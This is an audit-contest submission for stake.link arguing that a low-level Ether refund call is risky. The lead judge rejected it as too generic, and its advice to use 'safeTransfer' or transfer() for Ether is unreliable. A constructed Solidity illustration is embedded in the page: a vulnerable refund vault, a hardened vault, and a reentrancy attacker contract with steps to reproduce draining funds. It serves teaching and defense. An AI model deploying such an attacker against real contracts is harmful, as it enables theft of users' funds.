stake.link

DeFiHardhatBridge
27,500 USDC
Submission Details
Severity: high
Invalid

Use of low-level call to transfer Ether

The line of code in question is a low-level call to transfer Ether:

(bool success, ) = _sender.call{value: msg.value - fees}("");

This line is intended to refund any excess Ether sent to the contract when paying for fees natively (i.e., not using LINK tokens). The _sender variable represents the address that initiated the transfer and is supposed to receive the refund.

The issue here is that the _sender address is being used in a low-level call without any function selector. This could be manipulated if the _sender address is a contract that has a fallback function designed to perform malicious actions. Since the _sender is derived from user input (in the onTokenTransfer function), a malicious user could potentially exploit this by interacting with the contract using a malicious contract address as _sender.

To mitigate this risk, the contract should use safeTransfer or transfer instead of a low-level call to send Ether. These methods are safer because they limit the amount of gas forwarded to the recipient, reducing the risk of reentrancy attacks.
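The hazard the submission is alluding to is a contract recipient whose receive()/fallback re-enters the paying contract while some state is still unsettled. The following is a constructed illustration of that general pattern and its standard fix, added here as an example; it is not stake.link code, and the contract, interface and function names (IRefundVault, RefundVaultVulnerable, RefundVaultHardened, ReentrantClaimer, pay, claimRefund) are hypothetical. The vulnerable vault credits overpayment and later pushes it with a low-level call before zeroing the credit; the hardened vault keeps the low-level call but applies checks-effects-interactions ordering and a reentrancy lock, which is the mitigation most reviewers would expect rather than relying on transfer()'s 2300-gas stipend.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Constructed illustration (not stake.link code). All names are hypothetical.

interface IRefundVault {
    function pay() external payable;
    function claimRefund() external;
    function refundable(address) external view returns (uint256);
}

// Vulnerable: the refund is pushed with a low-level call BEFORE the credited
// amount is zeroed, so a contract recipient's receive() can re-enter
// claimRefund() and collect the same credit again while the vault has funds.
contract RefundVaultVulnerable is IRefundVault {
    uint256 public constant FEE = 0.01 ether;
    mapping(address => uint256) public override refundable;

    // Overpayment is credited to the payer instead of being refunded inline.
    function pay() external payable override {
        require(msg.value >= FEE, "fee not covered");
        refundable[msg.sender] += msg.value - FEE;
    }

    function claimRefund() external override {
        uint256 amount = refundable[msg.sender];
        require(amount > 0, "nothing to refund");
        // Interaction before effect: all remaining gas is forwarded and the
        // recipient's code runs here while refundable[msg.sender] is unchanged.
        (bool success, ) = msg.sender.call{value: amount}("");
        require(success, "refund failed");
        refundable[msg.sender] = 0; // too late: nested calls already read the old value
    }
}

// Hardened: checks-effects-interactions ordering plus a reentrancy lock.
// The low-level call is kept; what changes is that no state is stale when it runs.
contract RefundVaultHardened is IRefundVault {
    uint256 public constant FEE = 0.01 ether;
    mapping(address => uint256) public override refundable;
    uint256 private _locked = 1;

    modifier nonReentrant() {
        require(_locked == 1, "reentrant call");
        _locked = 2;
        _;
        _locked = 1;
    }

    function pay() external payable override {
        require(msg.value >= FEE, "fee not covered");
        refundable[msg.sender] += msg.value - FEE;
    }

    function claimRefund() external override nonReentrant {
        uint256 amount = refundable[msg.sender];
        require(amount > 0, "nothing to refund");
        refundable[msg.sender] = 0;                              // effect first
        (bool success, ) = msg.sender.call{value: amount}("");   // interaction last
        require(success, "refund failed");
    }
}

// Malicious recipient: its receive() re-enters claimRefund() while the vault
// still holds ETH. Against RefundVaultVulnerable it drains other payers'
// credits; against RefundVaultHardened the nested call reverts and the whole
// attack() transaction fails.
contract ReentrantClaimer {
    IRefundVault public immutable vault;
    uint256 public reentries;

    constructor(IRefundVault _vault) {
        vault = _vault;
    }

    function attack() external payable {
        vault.pay{value: msg.value}(); // credit = msg.value - FEE
        vault.claimRefund();
    }

    receive() external payable {
        // Against the vulnerable vault this credit is still non-zero here.
        uint256 credit = vault.refundable(address(this));
        if (credit > 0 && address(vault).balance >= credit && reentries < 10) {
            reentries++;
            vault.claimRefund();
        }
    }
}
```

To reproduce in a Hardhat or Foundry test, fund RefundVaultVulnerable with a few honest pay() calls, then deploy ReentrantClaimer pointed at it and call attack() with slightly more than FEE: the vault balance drops by roughly reentries + 1 refunds. Pointing the same attacker at RefundVaultHardened makes attack() revert. Whether the specific `_sender.call{value: msg.value - fees}("")` refund on this page is exploitable depends on what state is still unsettled at the moment the call runs, which is the part a finding of this kind needs to demonstrate.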

Updates

Lead Judging Commences

0kage Lead Judge over 1 year ago
Submission Judgement Published
Invalidated
Reason: Too generic
